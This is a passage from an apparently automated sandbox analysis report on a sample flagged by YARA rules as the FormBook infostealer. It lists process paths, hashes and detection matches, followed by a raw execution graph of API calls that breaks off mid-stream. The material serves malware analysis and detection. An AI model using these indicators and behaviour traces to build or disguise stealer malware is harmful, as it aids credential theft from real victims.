                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3361592338.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3361592338.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3361654877.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3361654877.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:moderate
                        Has exited:false

                        Target ID:9
                        Start time:06:42:47
                        Start date:09/10/2024
                        Path:C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe"
                        Imagebase:0x4d0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        Target ID:10
                        Start time:06:42:59
                        Start date:09/10/2024
                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Imagebase:0x7ff728280000
                        File size:676'768 bytes
                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:3.4%
                          Dynamic/Decrypted Code Coverage:1.5%
                          Signature Coverage:9.7%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:37
                          execution_graph 86253 4010e0 86256 401100 86253->86256 86255 4010f8 86257 401113 86256->86257 86258 401184 86257->86258 86259 40114c 86257->86259 86261 401120 86257->86261 86288 401182 86257->86288 86294 401250 86258->86294 86262 401151 86259->86262 86263 40119d 86259->86263 86260 40112c DefWindowProcW 86260->86255 86261->86260 86315 401000 Shell_NotifyIconW _memcpy_s 86261->86315 86265 401219 86262->86265 86266 40115d 86262->86266 86268 4011a3 86263->86268 86269 42afb4 86263->86269 86265->86261 86272 401225 86265->86272 86270 401163 86266->86270 86271 42b01d 86266->86271 86267 401193 86267->86255 86268->86261 86278 4011b6 KillTimer 86268->86278 86279 4011db SetTimer RegisterWindowMessageW 86268->86279 86310 40f190 10 API calls 86269->86310 86275 42afe9 86270->86275 86276 40116c 86270->86276 86271->86260 86314 4370f4 52 API calls 86271->86314 86326 468b0e 74 API calls _memcpy_s 86272->86326 86312 40f190 10 API calls 86275->86312 86276->86261 86282 401174 86276->86282 86277 42b04f 86316 40e0c0 86277->86316 86309 401000 Shell_NotifyIconW _memcpy_s 86278->86309 86279->86267 86280 401204 CreatePopupMenu 86279->86280 86280->86255 86311 45fd57 65 API calls _memcpy_s 86282->86311 86287 4011c9 PostQuitMessage 86287->86255 86288->86260 86289 42afe4 86289->86267 86290 42b00e 86313 401a50 329 API calls 86290->86313 86293 42afdc 86293->86260 86293->86289 86295 4012e8 86294->86295 86296 401262 _memcpy_s 86294->86296 86295->86267 86327 401b80 86296->86327 86298 40128c 86299 4012d1 KillTimer SetTimer 86298->86299 86300 4012bb 86298->86300 86301 4272ec 86298->86301 86299->86295 86304 4012c5 86300->86304 86305 42733f 86300->86305 86302 4272f4 Shell_NotifyIconW 86301->86302 86303 42731a Shell_NotifyIconW 86301->86303 86302->86299 86303->86299 86304->86299 86308 427393 Shell_NotifyIconW 86304->86308 86306 427348 Shell_NotifyIconW 86305->86306 86307 42736e Shell_NotifyIconW 86305->86307 86306->86299 86307->86299 86308->86299 86309->86287 86310->86267 86311->86293 86312->86290 86313->86288 86314->86288 86315->86277 86317 40e0e7 _memcpy_s 86316->86317 86318 40e142 86317->86318 86320 42729f DestroyIcon 86317->86320 86319 40e184 86318->86319 86425 4341e6 63 API calls __wcsicoll 86318->86425 86322 40e1a0 Shell_NotifyIconW 86319->86322 86323 4272db Shell_NotifyIconW 86319->86323 86320->86318 86324 401b80 54 API calls 86322->86324 86325 40e1ba 86324->86325 86325->86288 86326->86289 86328 401b9c 86327->86328 86348 401c7e 86327->86348 86349 4013c0 86328->86349 86331 42722b LoadStringW 86334 427246 86331->86334 86332 401bb9 86354 402160 86332->86354 86368 40e0a0 86334->86368 86335 401bcd 86337 427258 86335->86337 86338 401bda 86335->86338 86372 40d200 52 API calls 2 library calls 86337->86372 86338->86334 86339 401be4 86338->86339 86367 40d200 52 API calls 2 library calls 86339->86367 86342 427267 86343 42727b 86342->86343 86344 401bf3 _memcpy_s _wcscpy _wcsncpy 86342->86344 86373 40d200 52 API calls 2 library calls 86343->86373 86347 401c62 Shell_NotifyIconW 86344->86347 86346 427289 86347->86348 86348->86298 86374 4115d7 86349->86374 86355 426daa 86354->86355 86356 40216b _wcslen 86354->86356 86412 40c600 86355->86412 86359 402180 86356->86359 86360 40219e 86356->86360 86358 426db5 86358->86335 86411 403bd0 52 API calls ctype 86359->86411 86361 4013a0 52 API calls 86360->86361 86363 4021a5 86361->86363 86365 426db7 86363->86365 86366 4115d7 52 API calls 86363->86366 86364 402187 _memmove 86364->86335 86366->86364 86367->86344 86369 40e0b2 86368->86369 86370 40e0a8 86368->86370 86369->86344 86424 403c30 52 API calls _memmove 86370->86424 86372->86342 86373->86346 86376 4115e1 _malloc 86374->86376 86377 4013e4 86376->86377 86381 4115fd std::exception::exception 86376->86381 86388 4135bb 86376->86388 86385 4013a0 86377->86385 86378 41163b 86403 4180af 46 API calls std::exception::operator= 86378->86403 86380 411645 86404 418105 RaiseException 86380->86404 86381->86378 86402 41130a 51 API calls __cinit 86381->86402 86384 411656 86386 4115d7 52 API calls 86385->86386 86387 4013a7 86386->86387 86387->86331 86387->86332 86389 413638 _malloc 86388->86389 86391 4135c9 _malloc 86388->86391 86410 417f77 46 API calls __getptd_noexit 86389->86410 86390 4135d4 86390->86391 86405 418901 46 API calls 2 library calls 86390->86405 86406 418752 46 API calls 9 library calls 86390->86406 86407 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86390->86407 86391->86390 86394 4135f7 RtlAllocateHeap 86391->86394 86397 413624 86391->86397 86400 413622 86391->86400 86394->86391 86395 413630 86394->86395 86395->86376 86408 417f77 46 API calls __getptd_noexit 86397->86408 86409 417f77 46 API calls __getptd_noexit 86400->86409 86402->86378 86403->86380 86404->86384 86405->86390 86406->86390 86408->86400 86409->86395 86410->86395 86411->86364 86413 40c619 86412->86413 86414 40c60a 86412->86414 86413->86358 86414->86413 86417 4026f0 86414->86417 86416 426d7a _memmove 86416->86358 86418 426873 86417->86418 86419 4026ff 86417->86419 86420 4013a0 52 API calls 86418->86420 86419->86416 86421 42687b 86420->86421 86422 4115d7 52 API calls 86421->86422 86423 42689e _memmove 86422->86423 86423->86416 86424->86369 86425->86319 86426 40bd20 86428 40bd2d 86426->86428 86432 428194 86426->86432 86427 40bd43 86429 40bd37 86428->86429 86449 4531b1 85 API calls 5 library calls 86428->86449 86438 40bd50 86429->86438 86431 4281bc 86448 45e987 86 API calls ctype 86431->86448 86432->86427 86432->86431 86433 4281b2 86432->86433 86447 40b510 VariantClear 86433->86447 86437 4281ba 86439 426cf1 86438->86439 86440 40bd63 86438->86440 86459 44cde9 52 API calls _memmove 86439->86459 86450 40bd80 86440->86450 86443 40bd73 86443->86427 86444 426cfc 86445 40e0a0 52 API calls 86444->86445 86446 426d02 86445->86446 86447->86437 86448->86428 86449->86429 86451 40bd8e 86450->86451 86452 40bdb7 _memmove 86450->86452 86451->86452 86453 40bded 86451->86453 86454 40bdad 86451->86454 86452->86443 86455 4115d7 52 API calls 86453->86455 86460 402f00 86454->86460 86457 40bdf6 86455->86457 86457->86452 86458 4115d7 52 API calls 86457->86458 86458->86452 86459->86444 86461 402f10 86460->86461 86462 402f0c 86460->86462 86463 4268c3 86461->86463 86464 4115d7 52 API calls 86461->86464 86462->86452 86465 402f51 ctype _memmove 86464->86465 86465->86452 86466 425ba2 86471 40e360 86466->86471 86468 425bb4 86487 41130a 51 API calls __cinit 86468->86487 86470 425bbe 86472 4115d7 52 API calls 86471->86472 86473 40e3ec GetModuleFileNameW 86472->86473 86488 413a0e 86473->86488 86475 40e421 _wcsncat 86491 413a9e 86475->86491 86478 4115d7 52 API calls 86479 40e45e _wcscpy 86478->86479 86494 40bc70 86479->86494 86483 40e4a9 86483->86468 86484 401c90 52 API calls 86486 40e4a1 _wcscat _wcslen _wcsncpy 86484->86486 86485 4115d7 52 API calls 86485->86486 86486->86483 86486->86484 86486->86485 86487->86470 86513 413801 86488->86513 86543 419efd 86491->86543 86495 4115d7 52 API calls 86494->86495 86496 40bc98 86495->86496 86497 4115d7 52 API calls 86496->86497 86498 40bca6 86497->86498 86499 40e4c0 86498->86499 86555 403350 86499->86555 86501 40e4cb RegOpenKeyExW 86502 427190 RegQueryValueExW 86501->86502 86503 40e4eb 86501->86503 86504 4271b0 86502->86504 86505 42721a RegCloseKey 86502->86505 86503->86486 86506 4115d7 52 API calls 86504->86506 86505->86486 86507 4271cb 86506->86507 86562 43652f 52 API calls 86507->86562 86509 4271d8 RegQueryValueExW 86510 42720e 86509->86510 86511 4271f7 86509->86511 86510->86505 86512 402160 52 API calls 86511->86512 86512->86510 86514 41389e 86513->86514 86518 41381a 86513->86518 86515 4139e8 86514->86515 86517 413a00 86514->86517 86540 417f77 46 API calls __getptd_noexit 86515->86540 86542 417f77 46 API calls __getptd_noexit 86517->86542 86518->86514 86528 41388a 86518->86528 86535 419e30 46 API calls __mbstowcs_s_l 86518->86535 86519 4139ed 86541 417f25 10 API calls __mbstowcs_s_l 86519->86541 86523 41396c 86523->86514 86524 413967 86523->86524 86526 41397a 86523->86526 86524->86475 86525 413929 86525->86514 86527 413945 86525->86527 86537 419e30 46 API calls __mbstowcs_s_l 86525->86537 86539 419e30 46 API calls __mbstowcs_s_l 86526->86539 86527->86514 86527->86524 86531 41395b 86527->86531 86528->86514 86534 413909 86528->86534 86536 419e30 46 API calls __mbstowcs_s_l 86528->86536 86538 419e30 46 API calls __mbstowcs_s_l 86531->86538 86534->86523 86534->86525 86535->86528 86536->86534 86537->86527 86538->86524 86539->86524 86540->86519 86541->86524 86542->86524 86544 419f13 86543->86544 86545 419f0e 86543->86545 86552 417f77 46 API calls __getptd_noexit 86544->86552 86545->86544 86546 419f2b 86545->86546 86551 40e454 86546->86551 86554 417f77 46 API calls __getptd_noexit 86546->86554 86548 419f18 86553 417f25 10 API calls __mbstowcs_s_l 86548->86553 86551->86478 86552->86548 86553->86551 86554->86548 86556 403367 86555->86556 86557 403358 86555->86557 86558 4115d7 52 API calls 86556->86558 86557->86501 86559 403370 86558->86559 86560 4115d7 52 API calls 86559->86560 86561 40339e 86560->86561 86561->86501 86562->86509 86563 416454 86600 416c70 86563->86600 86565 416460 GetStartupInfoW 86566 416474 86565->86566 86601 419d5a HeapCreate 86566->86601 86568 4164cd 86569 4164d8 86568->86569 86684 41642b 46 API calls 3 library calls 86568->86684 86602 417c20 GetModuleHandleW 86569->86602 86572 4164de 86573 4164e9 __RTC_Initialize 86572->86573 86685 41642b 46 API calls 3 library calls 86572->86685 86621 41aaa1 GetStartupInfoW 86573->86621 86577 416503 GetCommandLineW 86634 41f584 GetEnvironmentStringsW 86577->86634 86581 416513 86640 41f4d6 GetModuleFileNameW 86581->86640 86583 41651d 86584 416528 86583->86584 86687 411924 46 API calls 3 library calls 86583->86687 86644 41f2a4 86584->86644 86587 41652e 86588 416539 86587->86588 86688 411924 46 API calls 3 library calls 86587->86688 86658 411703 86588->86658 86591 416541 86593 41654c __wwincmdln 86591->86593 86689 411924 46 API calls 3 library calls 86591->86689 86662 40d6b0 86593->86662 86596 41657c 86691 411906 46 API calls _doexit 86596->86691 86599 416581 type_info::_Type_info_dtor 86600->86565 86601->86568 86603 417c34 86602->86603 86604 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86602->86604 86692 4178ff 49 API calls _free 86603->86692 86606 417c87 TlsAlloc 86604->86606 86609 417cd5 TlsSetValue 86606->86609 86610 417d96 86606->86610 86608 417c39 86608->86572 86609->86610 86611 417ce6 __init_pointers 86609->86611 86610->86572 86693 418151 InitializeCriticalSectionAndSpinCount 86611->86693 86613 417d91 86701 4178ff 49 API calls _free 86613->86701 86615 417d2a 86615->86613 86694 416b49 86615->86694 86618 417d76 86700 41793c 46 API calls 4 library calls 86618->86700 86620 417d7e GetCurrentThreadId 86620->86610 86622 416b49 __calloc_crt 46 API calls 86621->86622 86631 41aabf 86622->86631 86623 41ac6a GetStdHandle 86628 41ac34 86623->86628 86624 416b49 __calloc_crt 46 API calls 86624->86631 86625 41acce SetHandleCount 86633 4164f7 86625->86633 86626 41ac7c GetFileType 86626->86628 86627 41abb4 86627->86628 86629 41abe0 GetFileType 86627->86629 86630 41abeb InitializeCriticalSectionAndSpinCount 86627->86630 86628->86623 86628->86625 86628->86626 86632 41aca2 InitializeCriticalSectionAndSpinCount 86628->86632 86629->86627 86629->86630 86630->86627 86630->86633 86631->86624 86631->86627 86631->86628 86631->86633 86632->86628 86632->86633 86633->86577 86686 411924 46 API calls 3 library calls 86633->86686 86635 41f595 86634->86635 86636 41f599 86634->86636 86635->86581 86711 416b04 86636->86711 86638 41f5bb _memmove 86639 41f5c2 FreeEnvironmentStringsW 86638->86639 86639->86581 86642 41f50b _wparse_cmdline 86640->86642 86641 41f54e _wparse_cmdline 86641->86583 86642->86641 86643 416b04 __malloc_crt 46 API calls 86642->86643 86643->86641 86645 41f2bc _wcslen 86644->86645 86649 41f2b4 86644->86649 86646 416b49 __calloc_crt 46 API calls 86645->86646 86651 41f2e0 _wcslen 86646->86651 86647 41f336 86718 413748 86647->86718 86649->86587 86650 416b49 __calloc_crt 46 API calls 86650->86651 86651->86647 86651->86649 86651->86650 86652 41f35c 86651->86652 86655 41f373 86651->86655 86717 41ef12 46 API calls __mbstowcs_s_l 86651->86717 86653 413748 _free 46 API calls 86652->86653 86653->86649 86724 417ed3 86655->86724 86657 41f37f 86657->86587 86659 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86658->86659 86661 411750 __IsNonwritableInCurrentImage 86659->86661 86743 41130a 51 API calls __cinit 86659->86743 86661->86591 86663 42e2f3 86662->86663 86664 40d6cc 86662->86664 86744 408f40 86664->86744 86666 40d707 86748 40ebb0 86666->86748 86672 40d737 86751 411951 86672->86751 86674 40d751 86763 40f4e0 SystemParametersInfoW SystemParametersInfoW 86674->86763 86676 40d75f 86764 40d590 GetCurrentDirectoryW 86676->86764 86678 40d767 SystemParametersInfoW 86679 40d78d 86678->86679 86680 408f40 VariantClear 86679->86680 86681 40d79d 86680->86681 86682 408f40 VariantClear 86681->86682 86683 40d7a6 86682->86683 86683->86596 86690 4118da 46 API calls _doexit 86683->86690 86684->86569 86685->86573 86690->86596 86691->86599 86692->86608 86693->86615 86696 416b52 86694->86696 86697 416b8f 86696->86697 86698 416b70 Sleep 86696->86698 86702 41f677 86696->86702 86697->86613 86697->86618 86699 416b85 86698->86699 86699->86696 86699->86697 86700->86620 86701->86610 86703 41f683 86702->86703 86708 41f69e _malloc 86702->86708 86704 41f68f 86703->86704 86703->86708 86710 417f77 46 API calls __getptd_noexit 86704->86710 86705 41f6b1 HeapAlloc 86707 41f6d8 86705->86707 86705->86708 86707->86696 86708->86705 86708->86707 86709 41f694 86709->86696 86710->86709 86714 416b0d 86711->86714 86712 4135bb _malloc 45 API calls 86712->86714 86713 416b43 86713->86638 86714->86712 86714->86713 86715 416b24 Sleep 86714->86715 86716 416b39 86715->86716 86716->86713 86716->86714 86717->86651 86719 41377c __dosmaperr 86718->86719 86720 413753 RtlFreeHeap 86718->86720 86719->86649 86720->86719 86721 413768 86720->86721 86727 417f77 46 API calls __getptd_noexit 86721->86727 86723 41376e GetLastError 86723->86719 86728 417daa 86724->86728 86727->86723 86729 417dc9 _memcpy_s __call_reportfault 86728->86729 86730 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86729->86730 86731 417eb5 __call_reportfault 86730->86731 86734 41a208 86731->86734 86733 417ed1 GetCurrentProcess TerminateProcess 86733->86657 86735 41a210 86734->86735 86736 41a212 IsDebuggerPresent 86734->86736 86735->86733 86742 41fe19 86736->86742 86739 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86740 421ff0 __call_reportfault 86739->86740 86741 421ff8 GetCurrentProcess TerminateProcess 86739->86741 86740->86741 86741->86733 86742->86739 86743->86661 86746 408f48 ctype 86744->86746 86745 4265c7 VariantClear 86747 408f55 ctype 86745->86747 86746->86745 86746->86747 86747->86666 86804 40ebd0 86748->86804 86808 4182cb 86751->86808 86753 41195e 86815 4181f2 LeaveCriticalSection 86753->86815 86755 40d748 86756 4119b0 86755->86756 86757 4119d6 86756->86757 86758 4119bc 86756->86758 86757->86674 86758->86757 86850 417f77 46 API calls __getptd_noexit 86758->86850 86760 4119c6 86851 417f25 10 API calls __mbstowcs_s_l 86760->86851 86762 4119d1 86762->86674 86763->86676 86852 401f20 86764->86852 86766 40d5b6 IsDebuggerPresent 86767 40d5c4 86766->86767 86768 42e1bb MessageBoxA 86766->86768 86769 42e1d4 86767->86769 86770 40d5e3 86767->86770 86768->86769 87024 403a50 52 API calls 3 library calls 86769->87024 86922 40f520 86770->86922 86774 40d5fd GetFullPathNameW 86934 401460 86774->86934 86776 40d63b 86777 40d643 86776->86777 86778 42e231 SetCurrentDirectoryW 86776->86778 86779 40d64c 86777->86779 87025 432fee 6 API calls 86777->87025 86778->86777 86949 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86779->86949 86782 42e252 86782->86779 86784 42e25a GetModuleFileNameW 86782->86784 86786 42e274 86784->86786 86787 42e2cb GetForegroundWindow ShellExecuteW 86784->86787 87026 401b10 86786->87026 86789 40d688 86787->86789 86788 40d656 86791 40d669 86788->86791 86792 40e0c0 74 API calls 86788->86792 86796 40d692 SetCurrentDirectoryW 86789->86796 86957 4091e0 86791->86957 86792->86791 86796->86678 86798 42e28d 87033 40d200 52 API calls 2 library calls 86798->87033 86801 42e299 GetForegroundWindow ShellExecuteW 86802 42e2c6 86801->86802 86802->86789 86803 40ec00 LoadLibraryA GetProcAddress 86803->86672 86805 40d72e 86804->86805 86806 40ebd6 LoadLibraryA 86804->86806 86805->86672 86805->86803 86806->86805 86807 40ebe7 GetProcAddress 86806->86807 86807->86805 86809 4182e0 86808->86809 86810 4182f3 EnterCriticalSection 86808->86810 86816 418209 86809->86816 86810->86753 86812 4182e6 86812->86810 86843 411924 46 API calls 3 library calls 86812->86843 86815->86755 86817 418215 type_info::_Type_info_dtor 86816->86817 86818 418225 86817->86818 86819 41823d 86817->86819 86844 418901 46 API calls 2 library calls 86818->86844 86821 416b04 __malloc_crt 45 API calls 86819->86821 86827 41824b type_info::_Type_info_dtor 86819->86827 86823 418256 86821->86823 86822 41822a 86845 418752 46 API calls 9 library calls 86822->86845 86825 41825d 86823->86825 86826 41826c 86823->86826 86847 417f77 46 API calls __getptd_noexit 86825->86847 86830 4182cb __lock 45 API calls 86826->86830 86827->86812 86828 418231 86846 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86828->86846 86832 418273 86830->86832 86834 4182a6 86832->86834 86835 41827b InitializeCriticalSectionAndSpinCount 86832->86835 86836 413748 _free 45 API calls 86834->86836 86837 418297 86835->86837 86838 41828b 86835->86838 86836->86837 86849 4182c2 LeaveCriticalSection _doexit 86837->86849 86839 413748 _free 45 API calls 86838->86839 86841 418291 86839->86841 86848 417f77 46 API calls __getptd_noexit 86841->86848 86844->86822 86845->86828 86847->86827 86848->86837 86849->86827 86850->86760 86851->86762 87034 40e6e0 86852->87034 86856 401f41 GetModuleFileNameW 87052 410100 86856->87052 86858 401f5c 87064 410960 86858->87064 86861 401b10 52 API calls 86862 401f81 86861->86862 87067 401980 86862->87067 86864 401f8e 86865 408f40 VariantClear 86864->86865 86866 401f9d 86865->86866 86867 401b10 52 API calls 86866->86867 86868 401fb4 86867->86868 86869 401980 53 API calls 86868->86869 86870 401fc3 86869->86870 86871 401b10 52 API calls 86870->86871 86872 401fd2 86871->86872 87075 40c2c0 86872->87075 86874 401fe1 86875 40bc70 52 API calls 86874->86875 86876 401ff3 86875->86876 87093 401a10 86876->87093 86878 401ffe 87100 4114ab 86878->87100 86881 428b05 86883 401a10 52 API calls 86881->86883 86882 402017 86884 4114ab __wcsicoll 58 API calls 86882->86884 86885 428b18 86883->86885 86886 402022 86884->86886 86888 401a10 52 API calls 86885->86888 86886->86885 86887 40202d 86886->86887 86889 4114ab __wcsicoll 58 API calls 86887->86889 86890 428b33 86888->86890 86891 402038 86889->86891 86893 428b3b GetModuleFileNameW 86890->86893 86892 402043 86891->86892 86891->86893 86894 4114ab __wcsicoll 58 API calls 86892->86894 86895 401a10 52 API calls 86893->86895 86896 40204e 86894->86896 86897 428b6c 86895->86897 86898 402092 86896->86898 86902 401a10 52 API calls 86896->86902 86907 428b90 _wcscpy 86896->86907 86899 40e0a0 52 API calls 86897->86899 86901 4020a3 86898->86901 86898->86907 86900 428b7a 86899->86900 86903 401a10 52 API calls 86900->86903 86904 428bc6 86901->86904 87108 40e830 53 API calls 86901->87108 86905 402073 _wcscpy 86902->86905 86906 428b88 86903->86906 86913 401a10 52 API calls 86905->86913 86906->86907 86910 401a10 52 API calls 86907->86910 86909 4020bb 87109 40cf00 53 API calls 86909->87109 86917 4020d0 86910->86917 86912 4020c6 86914 408f40 VariantClear 86912->86914 86913->86898 86914->86917 86915 402110 86919 408f40 VariantClear 86915->86919 86917->86915 86920 401a10 52 API calls 86917->86920 87110 40cf00 53 API calls 86917->87110 87111 40e6a0 53 API calls 86917->87111 86921 402120 ctype 86919->86921 86920->86917 86921->86766 86923 40f53c 86922->86923 86924 4295c9 _memcpy_s 86922->86924 87790 410120 86923->87790 86926 4295d9 GetOpenFileNameW 86924->86926 86926->86923 86928 40d5f5 86926->86928 86927 40f545 87794 4102b0 SHGetMalloc 86927->87794 86928->86774 86928->86776 86930 40f54c 87799 410190 GetFullPathNameW 86930->87799 86932 40f559 87810 40f570 86932->87810 87872 402400 86934->87872 86936 40146f 86939 428c29 _wcscat 86936->86939 87881 401500 86936->87881 86938 40147c 86938->86939 87889 40d440 86938->87889 86941 401489 86941->86939 86942 401491 GetFullPathNameW 86941->86942 86943 402160 52 API calls 86942->86943 86944 4014bb 86943->86944 86945 402160 52 API calls 86944->86945 86946 4014c8 86945->86946 86946->86939 86947 402160 52 API calls 86946->86947 86948 4014ee 86947->86948 86948->86776 86950 428361 86949->86950 86951 4103fc LoadImageW RegisterClassExW 86949->86951 87909 44395e EnumResourceNamesW LoadImageW 86950->87909 87908 410490 7 API calls 86951->87908 86954 40d651 86956 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86954->86956 86955 428368 86956->86788 86958 409202 86957->86958 86959 42d7ad 86957->86959 87013 409216 ctype 86958->87013 88181 410940 329 API calls 86958->88181 88184 45e737 90 API calls 3 library calls 86959->88184 86962 409386 86963 40939c 86962->86963 88182 40f190 10 API calls 86962->88182 86963->86789 87023 401000 Shell_NotifyIconW _memcpy_s 86963->87023 86965 4095b2 86965->86963 86967 4095bf 86965->86967 86966 409253 PeekMessageW 86966->87013 88183 401a50 329 API calls 86967->88183 86968 40d410 VariantClear 86968->87013 86970 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86970->86963 86972 4095f9 86970->86972 86971 42d8cd Sleep 86971->87013 86976 42e158 TranslateMessage DispatchMessageW GetMessageW 86972->86976 86974 42e13b 88202 40d410 VariantClear 86974->88202 86976->86976 86978 42e188 86976->86978 86978->86963 86980 409567 PeekMessageW 86980->87013 86982 44c29d 52 API calls 87022 4094e0 86982->87022 86983 46f3c1 107 API calls 86983->87013 86984 40e0a0 52 API calls 86984->87013 86985 46fdbf 108 API calls 86985->87022 86986 409551 TranslateMessage DispatchMessageW 86986->86980 86988 42dcd2 WaitForSingleObject 86989 42dcf0 GetExitCodeProcess CloseHandle 86988->86989 86988->87013 88191 40d410 VariantClear 86989->88191 86991 42dd3d Sleep 86991->87022 86992 47d33e 307 API calls 86992->87013 86994 40c620 timeGetTime 86994->87022 86996 4094cf Sleep 86996->87022 86998 42d94d timeGetTime 88187 465124 53 API calls 86998->88187 87002 42dd89 CloseHandle 87002->87022 87004 465124 53 API calls 87004->87022 87005 42de19 GetExitCodeProcess CloseHandle 87005->87022 87008 42de88 Sleep 87008->87013 87013->86962 87013->86966 87013->86968 87013->86971 87013->86974 87013->86980 87013->86983 87013->86984 87013->86986 87013->86988 87013->86991 87013->86992 87013->86996 87013->86998 87014 42e0cc VariantClear 87013->87014 87015 45e737 90 API calls 87013->87015 87016 408f40 VariantClear 87013->87016 87013->87022 87910 4091b0 87013->87910 87968 40afa0 87013->87968 87994 408fc0 87013->87994 88029 408cc0 87013->88029 88043 40d150 87013->88043 88048 40d170 87013->88048 88054 4096a0 87013->88054 88185 465124 53 API calls 87013->88185 88186 40c620 timeGetTime 87013->88186 88201 40e270 VariantClear ctype 87013->88201 87014->87013 87015->87013 87016->87013 87018 401980 53 API calls 87018->87022 87019 408f40 VariantClear 87019->87022 87020 401b10 52 API calls 87020->87022 87022->86982 87022->86985 87022->86994 87022->87002 87022->87004 87022->87005 87022->87008 87022->87013 87022->87018 87022->87019 87022->87020 88188 45178a 54 API calls 87022->88188 88189 47d33e 329 API calls 87022->88189 88190 453bc6 54 API calls 87022->88190 88192 40d410 VariantClear 87022->88192 88193 443d19 67 API calls _wcslen 87022->88193 88194 4574b4 VariantClear 87022->88194 88195 403cd0 87022->88195 88199 4731e1 VariantClear 87022->88199 88200 4331a2 6 API calls 87022->88200 87023->86789 87024->86776 87025->86782 87027 401b16 _wcslen 87026->87027 87028 4115d7 52 API calls 87027->87028 87031 401b63 87027->87031 87029 401b4b _memmove 87028->87029 87030 4115d7 52 API calls 87029->87030 87030->87031 87032 40d200 52 API calls 2 library calls 87031->87032 87032->86798 87033->86801 87035 40bc70 52 API calls 87034->87035 87036 401f31 87035->87036 87037 402560 87036->87037 87038 40256d __write_nolock 87037->87038 87039 402160 52 API calls 87038->87039 87041 402593 87039->87041 87051 4025bd 87041->87051 87112 401c90 87041->87112 87042 4026f0 52 API calls 87042->87051 87043 4026a7 87044 401b10 52 API calls 87043->87044 87050 4026db 87043->87050 87046 4026d1 87044->87046 87045 401b10 52 API calls 87045->87051 87116 40d7c0 52 API calls 2 library calls 87046->87116 87048 401c90 52 API calls 87048->87051 87050->86856 87051->87042 87051->87043 87051->87045 87051->87048 87115 40d7c0 52 API calls 2 library calls 87051->87115 87117 40f760 87052->87117 87055 410118 87055->86858 87057 42805d 87058 42806a 87057->87058 87173 431e58 87057->87173 87060 413748 _free 46 API calls 87058->87060 87061 428078 87060->87061 87062 431e58 82 API calls 87061->87062 87063 428084 87062->87063 87063->86858 87065 4115d7 52 API calls 87064->87065 87066 401f74 87065->87066 87066->86861 87068 4019a3 87067->87068 87073 401985 87067->87073 87069 4019b8 87068->87069 87068->87073 87779 403e10 53 API calls 87069->87779 87071 40199f 87071->86864 87072 4019c4 87072->86864 87073->87071 87778 403e10 53 API calls 87073->87778 87076 40c2c7 87075->87076 87077 40c30e 87075->87077 87078 40c2d3 87076->87078 87079 426c79 87076->87079 87080 40c315 87077->87080 87081 426c2b 87077->87081 87780 403ea0 52 API calls __cinit 87078->87780 87785 4534e3 52 API calls 87079->87785 87085 40c321 87080->87085 87086 426c5a 87080->87086 87083 426c4b 87081->87083 87084 426c2e 87081->87084 87783 4534e3 52 API calls 87083->87783 87091 40c2de 87084->87091 87782 4534e3 52 API calls 87084->87782 87781 403ea0 52 API calls __cinit 87085->87781 87784 4534e3 52 API calls 87086->87784 87091->86874 87094 401a30 87093->87094 87095 401a17 87093->87095 87097 402160 52 API calls 87094->87097 87096 401a2d 87095->87096 87786 403c30 52 API calls _memmove 87095->87786 87096->86878 87099 401a3d 87097->87099 87099->86878 87101 411523 87100->87101 87102 4114ba 87100->87102 87789 4113a8 58 API calls 3 library calls 87101->87789 87105 40200c 87102->87105 87787 417f77 46 API calls __getptd_noexit 87102->87787 87105->86881 87105->86882 87106 4114c6 87788 417f25 10 API calls __mbstowcs_s_l 87106->87788 87108->86909 87109->86912 87110->86917 87111->86917 87113 4026f0 52 API calls 87112->87113 87114 401c97 87113->87114 87114->87041 87115->87051 87116->87050 87177 40f6f0 87117->87177 87119 40f77b _strcat ctype 87185 40f850 87119->87185 87124 427c2a 87214 414d04 87124->87214 87126 40f7fc 87126->87124 87128 40f804 87126->87128 87201 414a46 87128->87201 87132 40f80e 87132->87055 87136 4528bd 87132->87136 87133 427c59 87220 414fe2 87133->87220 87135 427c79 87137 4150d1 _fseek 81 API calls 87136->87137 87138 452930 87137->87138 87720 452719 87138->87720 87141 452948 87141->87057 87142 414d04 __fread_nolock 61 API calls 87143 